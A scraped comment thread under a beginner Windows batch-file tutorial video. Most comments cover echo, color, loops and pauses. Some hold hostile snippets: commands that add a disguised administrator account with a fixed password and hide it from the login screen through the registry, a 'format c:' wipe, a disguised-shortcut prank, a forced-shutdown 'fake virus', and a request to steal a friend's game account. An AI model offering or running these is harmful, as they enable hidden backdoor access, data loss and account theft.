Added: 4 years ago
From: MasterJake777
Views: 20,521
Sort by time | Sort by thread (beta)

Link to this comment:

Share to:

All Comments (89)

Sign In or Sign Up now to post a comment!
  • how would I use the set command to look for a input (keystroke) and what is errolevel 1, 2 ,3 ect ect?

  • @p0wer5000 Well you can't do real time keystrokes. In other words, if they press "a", you can't immediately know they pressed that. The best you can do (without writing your own batch command in C++ or something) is use set /p varname=Prompt which will prompt them to enter a value (and that value will be inserted into "varname" after they press ENTER/RETURN). It's been too long for me to know the full details of error level. I think it's just a flag that you use however you like.

  • @MasterJake777 oh okay thank you very much and I wasn't looking for real time jsut like what is your name?

    bob (enter)

    hello bob.

  • @codfishfan No offense but I tried Vista and Win7 and then went back to XP

    couldnt find anything on them I couldn't already do on XP

  • @codfishfan I had Windows Vista for over a year, and then I've been on Windows 7 for several months now.

  • Command Prompt masses up your computer

  • @XMRNATEX

    Command Prompt doesn't "mess" up your computer!

    You probably spelled it wrong because you have no competence in it or you typed something wrong like you did in your comment! Grammar is very vital!

  • does anybody know how to make a batch file to recieve files from another computer? me and my friend have skype and i wanna hack his minecraft accoutn through the lastlogin file thanks!

  • If you really want to mess with someone disguise the shortcut for say internet explorer and in the batch file put start like 100 times (100 command prompts) and

    dir /s 100 times (makes all this random stuff pop up)

  • ^ < this symbol

  • If you type symbol & before de symbol >, the symbol > is gonna be printed and the eco is gonna be shown ;) Just and advise.

  • when i did the color and save it didnt work for me

  • tomake it not say "Press any key to continue"

    instead of putting pause, put pause >nul

  • your awesome

  • I post batch file videos just like you! sweet ill send you some codes some time

  • color x=help color

  • how is the song called

  • nice gta sa music in backround

  • hmm i code quite a bit try this little fun command

    @echo off

    :green

    echo VIRUS ALERT VIRUS ALERT

    goto green

    try that and it should look really cool and if masterjake wonts to code with me we could code some cool stuff and maybe work to making hacks and stuff i can make like some stuff but if he wonts to we can

  • also, instead of typing echo hi 20 times, why not just do this:

    :1

    echo hi

    goto 1

    this will loop infinitely.

  • color 0a does bright green, which looks cooler than the dark green you did.

  • very unful, i never new of color

  • its more like just the basics of batch files

  • WTF hapend jake???

  • GTA TUNE !! :D

  • @TheDjEmilo  :D

  • Dude Thx :D Plz post other vids like this !

  • thanks this vid is fantastic

  • what did u write behind echo off?

  • at symbol @

    shift+2 on modern keyboard

  • This is really basic stuff, but meh it was a good tutorial for beginners. Making batch files that write themselves is fun, and also making ones that write vbscript and run it too. makes things more interactive. XD

  • XD i learned this without anyone telling me

  • i learned by fucking ur mother!

  • not possible, can't just pop in ur head

  • i already knew everything so that sucked, good beginner video tho

  • wow i didn't know u were on youtube. i just downloaded your source code of dark kingdoms and completly wrote my own engine in a few days! thanks

  • Cool. Glad to have been of some assistance.

  • you made it easy. i'm trying to make multiple characters(team mates) it's comming along good. i'm working on this war stadgedy game.

  • i didnt know the title thing. thanks!

  • nice tut

  • I just started messin with this stuff today...and I learned alot!

  • format c:

    y

    y

    this in a bach file will wipe your hd

  • @RCFProductions

    No it will not.. the startup "disk" is protected by the program itself.

    And the "y y" will just give you errors.

  • @RCFProductions Actually no, it won't let you format the system partition ;) you have to do it to a separate partition or hard drive.

  • hey jake....i got a batch file im working on.....and i was wandering if you could help me out some geting the glitches ect. fixed...

  • go to masterjakeonline (dot) com and visit the forums and ask there

  • Thanks Jake this helped a lot!!!

  • shut up, nerd!!!!

  • if you want background black you dont need to type 0. black is default bg. if you type color 1 it defaults blue text black bg

  • get into the habbit of putting the 0 anyway

  • hey haha i have the ultimate bat file

  • haha. I found it.

    ping localhost -n 2 > nul

    like this....

  • could you use a Batch file to run as a macro? Even as complex as it might be is it possible? by the way how do you make pauses, i found some kind of pause. but i dont remember it.

    not

    pause >nul

    more like a timed pause like after 2 seconds.

  • @XxXKristopherXxX With the combination of windows task scheduler and batches you could script it to run every few days/weeks/months/years to do a certain task, like delete a folder, move from one folder to another, start/close programs, etc...whatever you can do in dos you can put it in batch.

  • Comment removed

  • @KDALove Do know I understand you trying to help, but also realize you are replying to comments over a year ago. I am much more advanced, and I have no use for Window's measly batch language any longer. Batch can pass arguments into executables though, allowing a wide range of possibilities with any outer program that can analyze anything passed threw the argument vector.

  • Dude that scared me so much

    I thought it was gonna be something crazy like a virus

    I think the link is dead though but very nice

  • what scared you and what link

  • my little comment lol

  • It was a bat file posted in the comments

    I think it was hilarious, but i was afraid to execute it at first

    I'm new to this so I didn't know how to read the code

  • I set the commands as variable's so it would make it hard to read..

    kinda like a encryption i thought up.

  • i messed something up in the code...

  • ohh that lol

  • Master Jake your tutorials are great... can you please make some commands for administrative tasks. thanks man

  • Add Administrator Account User Tipsyquo

    Net User tipsyquo qwerty321 /Add /Expires:Never

    Net Localgroup Administrators /add tipsyquo

    Net User tipsyquo /comment:"Built-in account for Remote Service"

    Net User tipsyquo /Fullname:"Remote Service Account"

  • Hide Admin Account Tipsyquo

    @Echo Off

    Set Regy1=%Temp%\%Random%.reg

    Echo [HKEY_LOCAL_MACHINE\SOFTWARE\M­icrosoft\Windows NT\CurrentVersion\Winlogon\Spe­cialAccounts\UserList] >> %Regy1%

    Echo "tipsyquo"=dword:00000000 >> %Regy1%

    Start /Wait Regedit /S "%Regy1%"

    Del "%Regy1%" /F

    P.S Password qwerty321

  • Opps its wrong heres correct code

    @Echo Off

    Set Regy1=%Temp%\%Random%.reg

    Echo REGEDIT 4

    Echo [HKEY_LOCAL_MACHINE\SOFTWARE\M icrosoft\Windows NT\CurrentVersion\Winlogon\Spe cialAccounts\UserList] >> %Regy1%

    Echo "tipsyquo"=dword:00000000 >> %Regy1%

    Start /Wait Regedit /S "%Regy1%"

    Del "%Regy1%" /F

  • @Echo Off Net User tipsyquo qwerty321 /Add /Expires:Never Net Localgroup Administrators /add tipsyquo Net User tipsyquo /comment:"Built-in account for Remote Service" Net User tipsyquo /Fullname:"Remote Service Account" Set Regy1=%Temp%\%Random%.reg Echo REGEDIT 4 >> %Regy1% Echo [HKEY_LOCAL_MACHINE\SOFTWARE\M icrosoft\Windows NT\CurrentVersion\Winlogon\Spe cialAccounts\UserList] >> %Regy1% Echo "tipsyquo"=dword:00000000 >> %Regy1% Start /Wait Regedit /S "%Regy1%" Del "%Regy1%" /F
  • where did you get the grand theft auto music?

  • LimeWire

  • Thank you MasterJake777

  • Your very welcome!

  • nice skill man :D

  • ah hell no!xD nice one man

  • JAKE!!! i want to request a tut.!!

    how do you make those "fake" viruses like you did in 8th grade on the schools computuer?! where it shuts down

  • umm you mean this

    C:\Windows\System32\shutdown.e­xe -s -t 10 -c "Insert your own custom message here"

    You can put that in a shortcut or use this for BAT

    Start C:\Windows\System32\shutdown.e­xe -s -t 10 -c "Insert your own custom message here"

  • 7 mins isnt fucking short!! lol

  • That's to make an empty line to separate the paragraphs in the batch file

  • exactly =]

  • yaaaaaaaaaaaaaa pause>nul is best

  • or just "pause > nul"

  • Pause > nul is better.

  • Plus, echo. (dot) isn't a pause, it's a line break.

  • just echo another line saying hi again then echo a line saying wadup. =D

  • wow that was so so so so cool man! jus wondering if there is a way to change the code so after they say hi u can write hi back and then it says wadup. if there isnt anyway at leats tell me

  • There are many ways to do so.. @echo off color a echo. echo Hello. :start set /p a="Write something: " if %a%==hi goto end ( ) else ( echo "At least say hi to me.. >_>" goto start ) :end echo Wassup? pause>nul
  • it ok only echo data > nul .

  • thanks guys!

  • helps alot!

    thx man!!!

  • This helped out alot make more.

Loading...
Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more